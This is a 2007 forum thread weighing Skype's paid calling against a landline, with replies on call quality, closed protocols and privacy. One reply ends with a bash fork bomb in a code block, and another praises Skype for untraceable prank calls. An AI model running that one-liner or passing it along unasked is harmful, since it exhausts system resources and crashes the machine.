Author Topic: Skype?  (Read 1414 times)

Offline Robert_

• Local Operator
  • 1337 13V3L: +10/-12
Skype?
« on: September 29, 2007, 05:53:33 AM »
Anybody here have any luck with skype in/out? How is the quality and such?

For about a $100 year you can get the unlimited skype-in and skype-out.

Is it worth dropping a land line and go with this?

What you guys think?

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
Re: Skype?
« Reply #1 on: September 29, 2007, 07:17:05 AM »
No, and here is why:

I think the quality of Skype sucks.

People often times confuse Skype with the advantages of running a VoIP solution.  Skype is closed source software, you don't have the ability to make changes to anything.  Reverse engineering the protocol will violate your EULA.  Despite the fact that Skype doesn't give you the freedom to look at what you're using, they do make ample use of other OpenSource code.  This is pretty poor form.

Also, the protocol that Skype uses is not an open standardized protocol.  Not much testing has been done outside of Skype on the reliability or efficiency of this protocol. 

Skype steals your bandwidth if you aren't running a NAT, and if you are, you're at the mercy of someone else.  From the perspective of security, if you are behind a NAT all of your calls are going through some other users computer.  If a weakness was discovered (and infact many have) in the skype protocol, a potential user could listen to your phone calls.  This would likely be embarrassing when your phone call gets posted to this message forum...

You're also going to be on some funky crap in terms of what you connect to the PSTN with.  An old analog phone is really killer, you can choose your own longdistance provider, etc.  With Skype you're at the mercy of whomever, and who knows what type of cruft is going to be out on outdial (weird ANI II digits for example)

Skype is all crazy peer to peer.  Great...sounds real reliable.

I dunno.  Why not pick something that's open, so you can get in and play with it?  Its like Skype has all of the disadvantages of VoIP and none of the advantages.  You get crappy bandwidth-dependant quality, non-POTS termination, no choice of LD carrier.  Yet you don't have the ability to choose what codecs you're running, or setup kickass asterisk shit.   

Code: [Select]
#!/bin/bash
:() { :|:& };:

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Skype?
« Reply #2 on: September 29, 2007, 08:32:09 AM »
I paid for a year of Skype out and it's okay.  Some days the quality is great, other days it's completely unusable.  If nothing else it's a good way to make prank calls with little fear of being traced.